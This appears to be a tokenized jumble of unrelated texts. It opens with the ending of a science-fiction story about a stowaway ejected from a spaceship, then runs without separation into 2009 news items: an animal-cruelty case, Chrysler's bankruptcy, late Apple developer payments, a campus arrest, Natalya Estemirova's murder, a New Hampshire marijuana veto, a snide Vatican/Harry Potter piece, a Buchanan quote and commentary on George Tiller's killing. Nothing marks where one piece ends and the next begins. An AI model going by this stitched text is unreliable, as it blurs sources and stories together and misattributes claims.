Regret was illogical — and yet , could knowing it to be illogical ever keep it away ?
She stopped occasionally , as though trying to find the right words to tell them what she wanted them to know ; then the pencil would resume its whispering to the paper .
It was 18:37 when she folded the letter in a square and wrote a name on it .
She began writing another , twice looking up at the chronometer , as though she feared the black hand might reach its rendezvous before she had finished .
It was 18:45 when she folded it as she had done the first letter and wrote a name and address on it .
She held the letters out to him .
“ Will you take care of these and see that they ’re enveloped and mailed ? ”
“ Of course . ”
He took them from her hand and placed them in a pocket of his gray uniform shirt .
“ These ca n’t be sent off until the next cruiser stops by , and the Stardust will have long since told them about me , wo n’t it ? ” she asked .
He nodded and she went on : “ That makes the letters not important in one way , but in another way they ’re very important — to me , and to them . ”
“ I know .
I understand , and I ’ll take care of them . ”
She glanced at the chronometer , then back to him .
“ It seems to move faster all the time , does n’t it ? ”
He said nothing , unable to think of anything to say , and she asked , “ Do you think Gerry will come back to camp in time ? ”
“ I think so .
They said he should be in right away . ”
She began to roll the pencil back and forth between her palms .
“ I hope he does .
I feel sick and scared and I want to hear his voice again and maybe I wo n’t feel so alone .
I ’m a coward and I ca n’t help it . ”
“ No , ” he said , “ you ’re not a coward .
You ’re afraid , but you ’re not a coward . ”
“ Is there a difference ? ”
He nodded .
“ A lot of difference . ”
“ I feel so alone .
I never did feel like this before ; like I was all by myself and there was nobody to care what happened to me .
Always , before , there were Mama and Daddy there and my friends around me .
I had lots of friends , and they had a going - away party for me the night before I left . ”
Friends and music and laughter for her to remember — and on the viewscreen Lotus Lake was going into the shadow .
“ Is it the same with Gerry ? ” she asked .
“ I mean , if he should make a mistake , would he have to die for it , all alone and with no one to help him ? ”
“ It ’s the same with all , along the frontier ; it will always be like that so long as there is a frontier . ”
“ Gerry did n’t tell us .
He said the pay was good , and he sent money home all the time because Daddy ’s little shop just brought in a bare living , but he did n’t tell us it was like this . ”
“ He did n’t tell you his work was dangerous ? ”
“ Well — yes .
He mentioned that , but we did n’t understand .
I always thought danger along the frontier was something that was a lot of fun ; an exciting adventure , like in the three - D shows . ”
A wan smile touched her face for a moment .
“ Only it ’s not , is it ?
It ’s not the same at all , because when it ’s real you ca n’t go home after the show is over . ”
“ No , ” he said .
“ No , you can ’t . ”
Her glance flicked from the chronometer to the door of the air lock , then down to the pad and pencil she still held .
She shifted her position slightly to lay them on the bench beside her , moving one foot out a little .
For the first time he saw that she was not wearing Vegan gypsy sandals , but only cheap imitations ; the expensive Vegan leather was some kind of grained plastic , the silver buckle was gilded iron , the jewels were colored glass .
Daddy ’s little shop just brought in a bare living ...
She must have left college in her second year , to take the course in linguistics that would enable her to make her own way and help her brother provide for her parents , earning what she could by part - time work after classes were over .
Her personal possessions on the Stardust would be taken back to her parents — they would neither be of much value nor occupy much storage space on the return voyage .
“ Is n’t it — ” She stopped , and he looked at her questioningly .
“ Is n’t it cold in here ? ” she asked , almost apologetically .
“ Does n’t it seem cold to you ? ”
“ Why , yes , ” he said .
He saw by the main temperature gauge that the room was at precisely normal temperature .
“ Yes , it ’s colder than it should be . ”
“ I wish Gerry would get back before it ’s too late .
Do you really think he will , and you did n’t just say so to make me feel better ? ”
“ I think he will — they said he would be in pretty soon . ”
On the viewscreen Lotus Lake had gone into the shadow but for the thin blue line of its western edge , and it was apparent he had overestimated the time she would have in which to talk to her brother .
Reluctantly , he said to her , “ His camp will be out of radio range in a few minutes ; he ’s on that part of Woden that ’s in the shadow ” — he indicated the viewscreen — “ and the turning of Woden will put him beyond contact .
There may not be much time left when he comes in — not much time to talk to him before he fades out .
I wish I could do something about it — I would call him right now if I could . ”
“ Not even as much time as I will have to stay ? ”
“ I ’m afraid not . ”
“ Then — ” She straightened and looked toward the air lock with pale resolution .
“ Then I ’ll go when Gerry passes beyond range .
I wo n’t wait any longer after that — I wo n’t have anything to wait for . ”
Again there was nothing he could say .
“ Maybe I should n’t wait at all .
Maybe I ’m selfish — maybe it would be better for Gerry if you just told him about it afterward . ”
There was an unconscious pleading for denial in the way she spoke and he said , “ He would n’t want you to do that , to not wait for him . ”
“ It ’s already coming dark where he is , is n’t it ?
There will be all the long night before him , and Mama and Daddy do n’t know yet that I wo n’t ever be coming back like I promised them I would .
I ’ve caused everyone I love to be hurt , have n’t I ?
I did n’t want to — I did n’t intend to . ”
“ It was n’t your fault , ” he said .
“ It was n’t your fault at all .
They ’ll know that .
They ’ll understand . ”
“ At first I was so afraid to die that I was a coward and thought only of myself .
Now I see how selfish I was .
The terrible thing about dying like this is not that I ’ll be gone but that I ’ll never see them again ; never be able to tell them that I did n’t take them for granted ; never be able to tell them I knew of the sacrifices they made to make my life happier , that I knew all the things they did for me and that I loved them so much more than I ever told them .
I ’ve never told them any of those things .
You do n’t tell them such things when you ’re young and your life is all before you — you ’re so afraid of sounding sentimental and silly .
But it ’s so different when you have to die — you wish you had told them while you could , and you wish you could tell them you ’re sorry for all the little mean things you ever did or said to them .
You wish you could tell them that you did n’t really mean to ever hurt their feelings and for them to only remember that you always loved them far more than you ever let them know . ”
“ You do n’t have to tell them that , ” he said .
“ They will know — they ’ve always known it . ”
“ Are you sure ? ” she asked .
“ How can you be sure ?
My people are strangers to you . ”
“ Wherever you go , human nature and human hearts are the same . ”
“ And they will know what I want them to know — that I love them ? ”
“ They ’ve always known it , in a way far better than you could ever put in words for them . ”
“ I keep remembering the things they did for me , and it ’s the little things they did that seem to be the most important to me , now .
Like Gerry — he sent me a bracelet of fire rubies on my sixteenth birthday .
It was beautiful — it must have cost him a month ’s pay .
Yet I remember him more for what he did the night my kitten got run over in the street .
I was only six years old and he held me in his arms and wiped away my tears and told me not to cry , that Flossy was gone for just a little while , for just long enough to get herself a new fur coat , and she would be on the foot of my bed the very next morning .
I believed him and quit crying and went to sleep dreaming about my kitten coming back .
When I woke up the next morning , there was Flossy on the foot of my bed in a brand - new white fur coat , just like he had said she would be .
It was n’t until a long time later that Mama told me Gerry had got the pet - shop owner out of bed at four in the morning and , when the man got mad about it , Gerry told him he was either going to go down and sell him the white kitten right then or he ’d break his neck . ”
“ It ’s always the little things you remember people by , all the little things they did because they wanted to do them for you .
You ’ve done the same for Gerry and your father and mother ; all kinds of things that you ’ve forgotten about , but that they will never forget . ”
“ I hope I have .
I would like for them to remember me like that . ”
“ They will . ”
“ I wish — ” She swallowed .
“ The way I ’ll die — I wish they would n’t ever think of that .
I ’ve read how people look who die in space — their insides all ruptured and exploded and their lungs out between their teeth and then , a few seconds later , they ’re all dry and shapeless and horribly ugly .
I do n’t want them to ever think of me as something dead and horrible like that . ”
“ You ’re their own , their child and their sister .
They could never think of you other than the way you would want them to , the way you looked the last time they saw you . ”
“ I ’m still afraid , ” she said .
“ I ca n’t help it , but I do n’t want Gerry to know it .
If he gets back in time , I ’m going to act like I ’m not afraid at all and — ”
The signal buzzer interrupted her , quick and imperative .
“ Gerry ! ” She came to her feet .
“ It ’s Gerry now ! ”
He spun the volume control knob and asked , “ Gerry Cross ? ”
“ Yes , ” her brother answered , an undertone of tenseness to his reply .
“ The bad news — what is it ? ”
She answered for him , standing close behind him and leaning down a little toward the communicator , her hand resting small and cold on his shoulder .
“ Hello , Gerry . ”
There was only a faint quaver to betray the careful casualness of her voice .
“ I wanted to see you — ” “ Marilyn ! ”
There was sudden and terrible apprehension in the way he spoke her name .
“ What are you doing on that EDS ? ”
“ I wanted to see you , ” she said again .
“ I wanted to see you , so I hid on this ship — ”
“ You hid on it ? ”
“ I ’m a stowaway ... I did n’t know what it would mean — ”
“ Marilyn ! ”
It was the cry of a man who calls , hopeless and desperate , to someone already and forever gone from him .
“ What have you done ? ”
“ I... it ’s not — ”
Then her own composure broke and the cold little hand gripped his shoulder convulsively .
“ Do n ’t , Gerry — I only wanted to see you ; I did n’t intend to hurt you .
Please , Gerry , do n’t feel like that — ”
Something warm and wet splashed on his wrist , and he slid out of the chair to help her into it and swing the microphone down to her level .
“ Do n’t feel like that .
Do n’t let me go knowing you feel like that — ”
The sob she had tried to hold back choked in her throat , and her brother spoke to her .
“ Do n’t cry , Marilyn . ”
His voice was suddenly deep and infinitely gentle , with all the pain held out of it .
“ Do n’t cry , Sis — you must n’t do that .
It ’s all right , honey — everything is all right . ”
“ I — ” Her lower lip quivered and she bit into it .
“ I did n’t want you to feel that way — I just wanted us to say goodbye , because I have to go in a minute . ”
“ Sure — sure .
That ’s the way it ’ll be , Sis .
I did n’t mean to sound the way I did . ”
Then his voice changed to a tone of quick and urgent demand .
“ EDS — have you called the Stardust ?
Did you check with the computers ? ”
“ I called the Stardust almost an hour ago .
It ca n’t turn back ; there are no other cruisers within forty light - years , and there is n’t enough fuel . ”
“ Are you sure that the computers had the correct data — sure of everything ? ”
“ Yes — do you think I could ever let it happen if I was n’t sure ?
I did everything I could do .
If there was anything at all I could do now , I would do it . ”
“ He tried to help me , Gerry . ”
Her lower lip was no longer trembling and the short sleeves of her blouse were wet where she had dried her tears .
“ No one can help me and I ’m not going to cry anymore and everything will be all right with you and Daddy and Mama , wo n’t it ? ”
“ Sure — sure it will .
We ’ll make out fine . ”
Her brother ’s words were beginning to come in more faintly , and he turned the volume control to maximum .
“ He ’s going out of range , ” he said to her .
“ He ’ll be gone within another minute . ”
“ You ’re fading out , Gerry , ” she said .
“ You ’re going out of range .
I wanted to tell you — but I ca n’t now .
We must say goodbye so soon — but maybe I ’ll see you again .
Maybe I ’ll come to you in your dreams with my hair in braids and crying because the kitten in my arms is dead ; maybe I ’ll be the touch of a breeze that whispers to you as it goes by ; maybe I ’ll be one of those gold - winged larks you told me about , singing my silly head off to you ; maybe , at times , I ’ll be nothing you can see , but you will know I ’m there beside you .
Think of me like that , Gerry ; always like that and not — the other way . ”
Dimmed to a whisper by the turning of Woden , the answer came back : “ Always like that , Marilyn — always like that and never any other way . ”
“ Our time is up , Gerry — I have to go now .
Good — ”
Her voice broke in midword and her mouth tried to
twist into crying .
She pressed her hand hard against it and when she spoke again the words came clear and true : “ Goodbye , Gerry . ”
Faint and ineffably poignant and tender , the last words came from the cold metal of the communicator : “ Goodbye , little sister ... ”
She sat motionless in the hush that followed , as though listening to the shadow - echoes of the words as they died away ; then she turned away from the communicator , toward the air lock , and he pulled down the black lever beside him .
The inner door of the air lock slid swiftly open to reveal the bare little cell that was waiting for her , and she walked to it .
She walked with her head up and the brown curls brushing her shoulders , with the white sandals stepping as sure and steady as the fractional gravity would permit and the gilded buckles twinkling with little lights of blue and red and crystal .
He let her walk alone and made no move to help her , knowing she would not want it that way .
She stepped into the air lock and turned to face him , only the pulse in her throat to betray the wild beating of her heart .
“ I ’m ready , ” she said .
He pushed the lever up and the door slid its quick barrier between them , enclosing her in black and utter darkness for her last moments of life .
It clicked as it locked in place and he jerked down the red lever .
There was a slight waver of the ship as the air gushed from the lock , a vibration to the wall as though something had bumped the outer door in passing ; then there was nothing and the ship was dropping true and steady again .
He shoved the red lever back to close the door on the empty air lock and turned away , to walk to the pilot ’s chair with the slow steps of a man old and weary .
Back in the pilot ’s chair he pressed the signal button of the normal - space transmitter .
There was no response ; he had expected none .
Her brother would have to wait through the night until the turning of Woden permitted contact through Group One .
It was not yet time to resume deceleration , and he waited while the ship dropped endlessly downward with him and the drives purred softly .
He saw that the white hand of the supply - closet temperature gauge was on zero .
A cold equation had been balanced and he was alone on the ship .
Something shapeless and ugly was hurrying ahead of him , going to Woden , where her brother was waiting through the night , but the empty ship still lived for a little while with the presence of the girl who had not known about the forces that killed with neither hatred nor malice .
It seemed , almost , that she still sat , small and bewildered and frightened , on the metal box beside him , her words echoing hauntingly clear in the void she had left behind her :
I did n’t do anything to die for ...
I did n’t do anything ...
♠
MUSKOGEE , Oklahoma ( AP )  A 23 - year - old woman who got a friend to kill her Jack Russell terrier was charged with skinning the puppy to make a belt out of its hide .
Krystal Lynn Lewis and Austin Michael Mullins , 26 , were being held Friday in the Muskogee County jail on $ 25,000 bail each .
They were charged with one felony count of cruelty to animals .
A Muskogee County judge ordered a mental competency hearing for Lewis .
Lewis wanted the puppy , named Poplin , killed because it was a gift from a female ex-lover with whom she does n't get along , said Muskogee County sheriff 's deputy George Roberson .
Roberson said Mullins shot the terrier 10 times with a . 22 - caliber pistol .
Lewis skinned the animal at her apartment and nailed the hide to a board .
Copyright 2009 The Associated Press .
All rights reserved .
This material may not be published , broadcast , rewritten or redistributed .
well u haz no polypz just sum skittlez
Share Tweet Stumble Pin It Email
NEW YORK ( CNNMoney.com ) --
A group of Indiana pension funds has made a last - minute effort to block Chrysler 's deal with Italian automaker Fiat .
An appeals court Friday upheld Chrysler LLC 's plan to exit bankruptcy .
The ruling backs the formation of a new company that will be owned jointly by the U.S. government , an autoworker 's union retiree fund and Fiat .
The deal will go through on Monday afternoon unless the Supreme Court intervenes , Chrysler attorney Corinne Ball told CNN .
But late Saturday , the group of Indiana pension funds that are seeking to block the deal filed an emergency appeal with the Supreme Court asking for a stay in the sale to Fiat .
The request was filed with Supreme Court Justice Ruth Bader Ginsburg .
She could act on her own or refer the case to the remainder of the court .
A stay from the full court would require a majority of the court 's nine members .
" Absent a stay , the Court will be deprived of the opportunity to decide critical , nationally significant legal issues relating to management of the economy by the United States Government , " the funds said in their stay application .
Indiana Treasurer Richard Mourdock had appealed the ruling of a federal bankruptcy court on May 31 allowing Chrysler to sell its best - performing assets , including factories and dealerships , to a new company called the Chrysler Group .
Mourdock made his appeal on behalf of three pension funds -- for Indiana teachers and state police , as well as a " Major Moves " construction fund .
The funds hold about $ 42 million , or less than 1 % , of Chrysler 's $ 6.9 billion debt .
Chrysler applauded the court 's decision to uphold the sale , saying it " appreciates its recognition of the need for a swift conclusion to this process so we can quickly begin building the new company . "
The automaker has been trying to leave behind its debt as part of the Chapter 11 process , which would wipe out part of the pension fund 's holdings .
It filed for Chapter 11 on April 30 .
The Chrysler Group would be comprised by several major stakeholders .
The biggest share , of 55 % , would be controlled by a United Auto Workers union trust .
The Italian automaker Fiat would own 20 % initially , though this share could eventually increase .
A minority stake of 8 % would go to the U.S. government , and 2 % would be held by the federal and provincial governments of Canada and Ontario .
Mourdock said the pension funds are secured creditors and therefore they deserve a place at the table .
White & Case , the prominent law firm representing his appeal , is arguing that the bankruptcy court ignored various legal points in approving the asset sale .
Chrysler 's asset sale was approved just hours before bankruptcy filing of General Motors ( GMGMQ ) on June 1 .
The Big Three automakers have been hammered in the last of couple years by rising fuel prices , the drying - up of bank loans to customers , and a recession that has severely hampered consumer spending .
While Apple keeps bragging about one billion iPhone apps sold , some developers are fed up with their outrageous payment delays .
Some cases are dramatic , deeply affecting indie developer 's families in the middle of the crisis :
Apple Hits One Billion Apps
We already spoiled it for you , but Apple just hit 1 billion App Store downloads .
We 'll have to wait Read more
30 something year old family man with bills to pay owed 1,000's ( soon to be 10's of thousands if March is missed also ) here .
I 'm with you .
I am a 30 year old work - from - home Dad of 2 kids .
I 'm owed probably about $ 10 k at this point ( $ 2 k from past months , $ 8 k from the month with no payments or financial reports yet ) .
This is a BIG deal for me and my family .
Over $ 10,000 here .
Family , kids , mortgage etc .
Mails unanswered etc .
In dispair .
No where to go .
They do n't reply to emails and there is no number .
Ca n't do anything physically because I 'm in the European Union .
Apple still owes me more than $ 7,500 since September 2008 for US and World regions .
I supplied them with a new SWIFT code and a intermediary bank they could use last month , but still nothing .
Sent them tons of emails but I never got to know what is really wrong / faulty so I just tried to give them another SWIFT code that DNB ( Biggest bank in Norway ) uses .
All other region payments have been OK .
Apple owes me near $ 2000 since Feb .
Zero payment received .
Zero email replies .
Apple acts as a distribution channel for all iPhone OS - based software through their iTunes App Store .
They get the micro-payments from the customers , getting a 30 % share of each sale .
Every month they add the totals and pay developers the 70 % in a single money transfer , which — according to the developer contract — should arrive within 45 days of the end of the month .
Advertisement
As you can see , this has not been the case in the quotes above and apparently many others .
Months have passed in many instances , and there 's still no sign of the money .
In fact , according to developers , the situation is so bad that some are threatening to sue Apple for breach of contract .
If you are a developer and have some horror — or good — stories to share about this , you know where we are .
[ iphonedevsdk forums and iphonedevsdk forums via TechCrunch ]
This archived news story is available only for your personal , non-commercial use .
Information in the story may be outdated or superseded by additional information .
Reading or replaying the story in its archived form does not constitute a republication of the story .
Editor 's note : Maurice Henry Glen Crichlow initially pleaded guilty , on August 12 , 2009 , to a class B misdemeanor ( obstructing justice ) and a class C misdemeanor ( disorderly conduct ) .
Those charges were subsequently amended and reduced on December 14 , 2016 , to a class B misdemeanor ( charge 1 ) and an infraction ( charge 2 ) .
OGDEN -- Weber State University police booked a man into jail on investigation of felony robbery after an apparently disastrous trip through the buffet line .
Campus officials said it happened Thursday at the Shepherd Union Building , where a buffet had been set up for competitors in an archery tournament .
Police said Maurice Henry Glen Crichlow , 20 , was spotted going through the line and confronted by a food services employee .
" He did not appear to be a member of the competition , " WSU spokesman John Kowalewski said Friday .
" This individual ( the food services worker ) approached the young man - this is the second time he'd been seen in the line that day - and informed him that if he wanted the food he needed to pay for the food . "
Kowalewski said the man became belligerent , pushed the one worker and was immediately confronted by another food service worker .
" At that point this individual shoved , or pushed the second staff member and said , ' If you 've got a problem with me , call police , ' " Kowalewski said .
They did .
Crichlow was ultimately arrested and booked into the Weber County Jail on investigation of second - degree felony robbery , disorderly conduct and interfering with an arrest .
E-mail : bwinslow@ksl.com
×
MOSCOW  A prominent human rights worker who for a decade documented kidnappings and killings in Chechnya was snatched outside her home on Wednesday and found a few hours later near a highway in a neighboring republic , dead of gunshot wounds to the head and chest .
The victim , Natalya Estemirova , 50 , had become a central source of information on abuses in Chechnya , where separatist war has given way to a brutal counterinsurgency campaign .
In recent years , Ms. Estemirova focused on kidnappings that she believed had been carried out under the authority of the Chechen president , Ramzan A. Kadyrov , who has enjoyed unwavering public support from the Kremlin .
Her work met with threats and denunciations from Chechen authorities .
In March 2008 , after Ms. Estemirova criticized a new law requiring women in Chechnya to wear head scarves , Mr. Kadyrov summoned her to a personal meeting and threatened her , an experience so frightening that she went abroad for several months , said Tatyana Kasatkina , deputy director of the Russian human rights group Memorial , where Ms. Estemirova had worked since 1999 .
Friends tried to convince Ms. Estemirova to stay away , but she felt compelled to return .
An employee with Memorial ’s Moscow office , Andrei Mironov , said several men pushed Ms. Estemirova into a white car as she left for work in the Chechen capital of Grozny about 8:30 a.m. Wednesday .
Witnesses said that she yelled out that she was being kidnapped .
Her body was found in the afternoon about 50 miles away , a few hundred yards off a highway in Ingushetia , according to a statement by the prosecutor general ’s investigative wing .
The authorities said her purse , with her passport and other documents , was found nearby .
Lynch cited concerns with what he considered to be loose guidelines for cultivation and distribution in refusing to make New Hampshire the 14th state to allow people with a debilitating condition to use marijuana for relief .
“ I understand and empathize with the advocates for allowing medical marijuana use in New Hampshire .
However , the fact remains that marijuana use for any purpose remains illegal under federal law .
Therefore , if we are to allow its use in New Hampshire for medical purposes , we must ensure that we are implementing the right policy , ’’ Lynch said in his veto statement .
“ We can not set a lower bar for medical marijuana than we do for other controlled substances , and we cannot implement a law that still has serious flaws . ’’
This was cold comfort to Rep. Cindy Rosenwald , D - Nashua , who led a bipartisan effort in the House and Senate to re-craft the bill in hopes of getting Lynch ’s support .
“ I am disappointed by the governor ’s veto , ’’ Rosenwald said in a statement .
“ I believe the final version was the tightest and most precise medical marijuana legislation of any state . ’’
Unlike every other state with it , this bill would have kept patients and caregivers from being able to cultivate the drug that remains illegal to possess under federal law .
Instead , Rep. Evalyn Merrick , D - Lancaster , a cancer survivor , agreed to change her bill to restrict possession of marijuana in private , nonprofit compassion centers that would then dispense the drug to eligible patients and designated caregivers .
“ Scaling back to three cultivation / distribution centers with mandatory criminal background checks on individuals would have allowed us to make sure only qualifying patients could get access to a safe supply of marijuana , ’’ Rosenwald continued .
Lynch recognized the legislator ’s hard work , but that was n’t enough to entice him to sign the bill into law .
“ After consulting with representatives of the appropriate state agencies and law enforcement officials , I believe this legislation still has too many defects to move forward , ’’ he said .
This was one of Lynch ’s most detailed veto messages and appropriately since it will stand the stiffest test of his gubernatorial authority since first becoming governor in January 2005 .
“ There are also many inconsistencies and structural problems in the legislation that would greatly complicate its administration and would pose barriers to controls aimed at preventing the unauthorized use of marijuana , ’’ Lynch continued .
Matt Simon , executive director of New Hampshire Common Sense for Marijuana Policy , questioned if Lynch ever was open - minded on the subject and urged lawmakers to ignore this setback and make the bill become law over his opposition .
“ If Governor Lynch really has ‘ tremendous compassion ’ for patients , and if his concerns about the bill ’s details are sincere , then he should have worked more closely with the committee that worked so diligently to address his concerns , ’’ Simon said .
“ The legislature should be outraged by the governor ’s lack of leadership on this issue , and if legislators hear from their constituents in support of this bill , we may be able to gain the votes necessary to override this veto . ’’
Dennis Acton is a Fremont Republican and cancer survivor who has appeared in commercials promoting the bill .
“ I ’m disappointed that Governor Lynch did not meet with patients like me before deciding medical marijuana users should continue to risk arrest and jail time to relieve their suffering , ’’ said Acton , who used it to treat nausea when undergoing radiation therapy in 1999 .
“ I ’m urging my fellow Republicans who are in the Legislature to have the courage to stand up and override this veto . ’’
The fight returns to the House where a two - thirds super majority is needed to override a Lynch veto .
In June the House voted for the bill , 232- 108 , well more than necessary to override Lynch .
The anti-veto campaign is more difficult in the state Senate , where supporters are two votes shy of mustering the needed margin to make this state law .
Lynch adopted the argument that the bill had untold government costs and that fees could be so expensive it would allow access to marijuana for only the wealthiest patients .
“ We applaud Governor Lynch for vetoing the medicinal marijuana bill , ’’ said Kevin Smith , executive director of the fiscally and socially conservative Cornerstone Policy Research group .
“ Given the precarious situation of the new state budget , now would not have been the time to add additional state spending and burden the taxpayers even more to pay for the monitoring of marijuana use in the state . ’’
Bill No : HB 648 .
Sponsor : Lancaster Democratic State Rep. Evalyn Merrick
Description :
The original bill would have let patients and designated caregivers have six plants and up to two ounces of useable marijuana to help people with a “ debilitating medical condition ’ ’ as long as it ’s under the supervision of a physician .
A conference committee of House and Senate negotiators changed the bill in hopes of winning over support from Gov. John Lynch .
The new compromise did not permit residents to grow marijuana but forced them to obtain it from up to three nonprofit compassion centers .
It allowed patients to receive up to 2 ounces of marijuana every 10 days .
Supporters said patients would consume more either by eating or inhaling the drug rather than risk other health issues by smoking pot .
These compassion center outlets would obtain the marijuana from similar sites in the 13 states where it ’s now legal for ill residents to use marijuana for medicinal purposes .
Status : Gov. John Lynch vetoed the bill Friday .
The New Hampshire House of Representatives and , if necessary , the State Senate will meet later this summer or early fall to vote on whether to sustain or override that move .
Source : Nashua Telegraph , The ( Nashua , NH )
Author : Kevin Landrigan , Staff Writer
Published : Saturday , July 11 , 2009
Copyright : 2009 Telegraph Publishing Company
Contact : letters@nashuatelegraph.com
Website : http://www.nashuatelegraph.com
URL : http://drugsense.org/url/5gk1VqIF
Related Articles :
NH Governor Vetoes Medicinal Marijuana Bill
http://cannabisnews.com/news/thread24913.shtml
Marijuana Bill Sent To Lynch
http://cannabisnews.com/news/thread24893.shtml
IN a move that suggests it desperately wants to be seen as “ cool ” , the Vatican has done a U - turn on Harry Potter , which the Pope once condemned for “ undermining the soul of Christianity ” .
In 2003 , two years before he was elected Pope , Joseph “ Boy Nazi ” Ratzinger , then a Cardinal and head of Vatican doctrine , said that J K Rowling ’s stories of the boy wizard threatened to corrupt an understanding of Christian faith among the impressionable young .
He then said in a letter to a critic of the books , who argued that they were anti-religious and encouraged the occult :
It is good that you explain the facts of Harry Potter because this is a subtle seduction , which has deeply unnoticed and direct effects in undermining the soul of Christianity before it can really grow properly .
But now the latest in the film series , Harry Potter and the Half - Blood Prince , has won surprising praise from the Vatican newspaper .
L’Osservatore Romano said this week that even though the Potter saga lacked what it called “ a reference to the transcendent ” , the film drew :
A clear line of demarcation between good and evil , making clear that good is right , and that in some cases this involves hard work and sacrifices .
This , reports
The Times , represents a remarkable U - turn by a paper that has previously attacked the series , saying that , although the books had narrative value , they held up witchcraft and the occult as positive ideals , unlike The Chronicles of Narnia by C S Lewis and J R R Tolkien ’s The Lord of the Rings .
Last year the paper argued that Harry , played by atheist , gay - friendly Daniel Radcliffe , was the wrong kind of hero and the stories , although compelling , were full of half truths , offering a view :
Full of deep mistakes and dangerous suggestions .
This time its reviewer praised the special effects in Harry Potter and the Half - Blood Prince , the sixth Potter film .
Now we know that this has nothing to do with religion , unless you are a Rastafarian , but we have just learned that another actor in the Harry Potter movie , Jamie Waylett , who plays school bully Vincent Crabbe , pleaded guilty , during a hearing yesterday at City of Westminster Magistrates ’
Court , to growing pot .
Police found eight bags of cannabis and a knife during a search of a car Waylett was riding in .
They then searched his mother ’s house and found ten marijuana plants .
Waylett pleaded guilty to producing cannabis , which carries a maximum 14 - year sentence .
His friend John Innis pleaded guilty to drug possession .
Judge Timothy Workman said the pair would be sentenced Tuesday .
About us at Ralph Smyth
Oh Pat.
Rachel Maddow had crazy ole " Uncle Pat " on her show tonight to discuss the Sonia Sotomayor Supreme Court nomination and Buchanan went over the dark side with a " white people built this country and deserve more " rant .
Asked by Maddow why it was that 108 out of the 110 United States Supreme Court justices have been white , Buchanan said the following :
I think white men were 100 % of the people who wrote the constitution , 100 % of the people who signed the Declaration of Independence , 100 % of the people who died at Gettysburg and Vicksburg , probably close 100 % of the people who died at Normandy .
This has been a country basically built by white folks .
This whole clip is especially cringeworthy because we actually find Buchanan kind of endearing from time to time .
He is not anything close to endearing here , and Maddow pretty much slices him up .
The Murder of Dr. George Tiller
Militant Anti-Abortion Activity , the Patriot Movement , & the Christian Right PHOTO : Dr. George Tiller 's Wichita clinic was the target of continuing demonstrations by Operation Rescue dating to August 1991 and its massive " Summer of Mercy " protests .
The recent killing of Dr. George Tiller , an abortion provider who has been targeted by anti-abortion activists for decades , has prompted a reexamination of the motivations for violence against clinics and providers .
Some anti-abortion activists respond to the slogan , “ If abortion is murder , then act like it ” by engaging in non-violent demonstrations or civil disobedience , but others feel that performing abortions justifies a violent response .
This small subset of the anti-abortion movement sometimes intersects with people who deeply oppose what they see as government intrusion , especially by liberal policies , into their lives .
This web resource is intended to shed light on the complex relationships between thought and action behind the assassination .
Guest Commentary : Killing for Life Returns
Posted June 3 , 2009
The murder of Dr. George Tiller in Kansas raises again the question of what it means to defend life through killing .
When militant antiabortionists began bombing clinics and shooting doctors in the 1980s and 1990s , law enforcement officials looked for some conspiracy among the perpetrators .
They did not find conspiracy .
What they needed to look for was a cultural explanation for how members of a movement dedicated to defending life began to kill for life .
Read More ... PRA Senior Analyst Chip Berlet and Public Eye magazine contributor Fred Clarkson speak about the murder on this Democracy Now video .
Listen to Chip Berlet in a radio interview by Dori Smith on TalkNationRadio .
Statement From Political Research Associates June 1 , 2009
The anti-abortion movement harbors within it a subculture of militant activists who believe the slogan , “ If abortion is murder , then act like it ” says Pam Chamberlain , senior researcher at PRA “ For some this means attending demonstrations or engaging in acts of civil disobedience ; for others it means committing murder . ”
Many of these activists are motivated by their religious beliefs , but there are other factors involved as well .
The election of Barack Obama traumatized whole sections of the U.S. Right .
Right - wing media demagogues have been quick to exploit this angry constituency by using rhetoric that demonizes not just Obama and the Democrats but liberal ideology itself .
Using the rhetoric of Right - Wing populism , opportunistic pundits and politicians portray liberal government programs as picking the pockets of hard - working taxpayers to help undeserving poor people , lazy parasites , and unlawful immigrants .
By using the tools of fear , irresponsible public figures are cultivating an aggressive constituency comprised of people who feel that militant action is justified , because in their view the Obama administration has shut them out of the political process .
“ The current political environment is awash with seemingly absurd but nonetheless influential conspiracy theories , hyperbolic claims , and demonized targets , ” explains Chip Berlet , senior analyst at PRA , “ and this creates a milieu where violence is a likely outcome . ”
Periods of right - wing populism in the United States often emerge during times of political , economic , or social stress , generating movements in which White men who feel displaced and ignored blame their sense of loss on targeted scapegoats .
“ This frequently happens when elections favor the Political Left and the society is seen as moving towards greater social equality or away from traditional societal hierarchies , ” says Berlet .
“ In this scenario it is easier for right - wing demagogues to successfully demonize liberals as abandoning morality and crafting a tyrannical New World Order .
“ Today targeted scapegoats include not only liberals but also immigrants , Muslims , gay people , and abortion rights activists , ” says Berlet , co-author of the award - winning book Right - Wing Populism in America .
In the 1990s , there was a significant overlap between the Patriot Movement and the anti-abortion movement In late 1994 John C. Salvi III who trained with a militia group in Florida , launched an armed attack in which Boston abortion clinic workers were killed or wounded .
Salvi later cited obscure economic and religious theories popular in the Patriot Movement , armed citizens militia , and “ Constitutionalist ” movement including the Montana Freeman .
“ This is not the time to undermine free speech or civil liberties , ” says Tarso Ramos , Director of Political Research Associates .
“ Yet we must hold accountable the media pundits and political actors who through campaigns of exaggeration and deceit have created an atmosphere where some among the many anxious and angry people are bound to conclude there is no option available but to turn to violence .
Likewise , we must hold accountable those civic leaders and media companies who stand by silently as this environment grows evermore toxic to democracy . ”
Toxic to Democracy
How the Tools of Fear Can Lead to Violence Right - wing media pundits and politicians have been using the Tools of Fear : dualism , demonization , scapegoating , aggressive apocalypticism , and conspiracy theories .
This create a volitile environment where some people mobilized by this demagogy decide to turn to violence .
Conspiracy theories about the Obama administration and his " liberal " allies betraying the country contribute to this dangerous dynamic .
A few days after the inauguration came a warning that Obama planned to impose martial law and collect all guns .
The first clues of the impending tyranny would involve changes in traffic laws and signage .
Many of these false claims recall those floated by right - wing conspiracy theorists in the armed citizens Militia Movement during the Clinton administration – allegations that percolated up through the media hierarchy and were utilized by Republican political operatives to hobble the legislative agenda of the Democratic Party .
While conspiracists tell compelling stories , they frequently create dangerous conditions as these stories can draw from pre-existing stereotypes and prejudices .
Cynical movement leaders then can hyperbolize false claims in a way that mobilizes overt forms of discrimination .
People who believe conspiracist allegations sometimes act on those irrational beliefs , and this has concrete consequences in the real world .
Angry allegations can quickly turn into aggression and violence targeting scapegoated groups .
From Toxic to Democracy , by Chip Berlet , a report to be released this week .
Militant Anti-abortion Activism , the Militia Movement and Christian Patriotism " The decade old cross-fertilization between militant anti-abortion activism , the militia movement and Christian Patriotism in the 1990s continues into the new century ... "
-- Frederick Clarkson , 2001
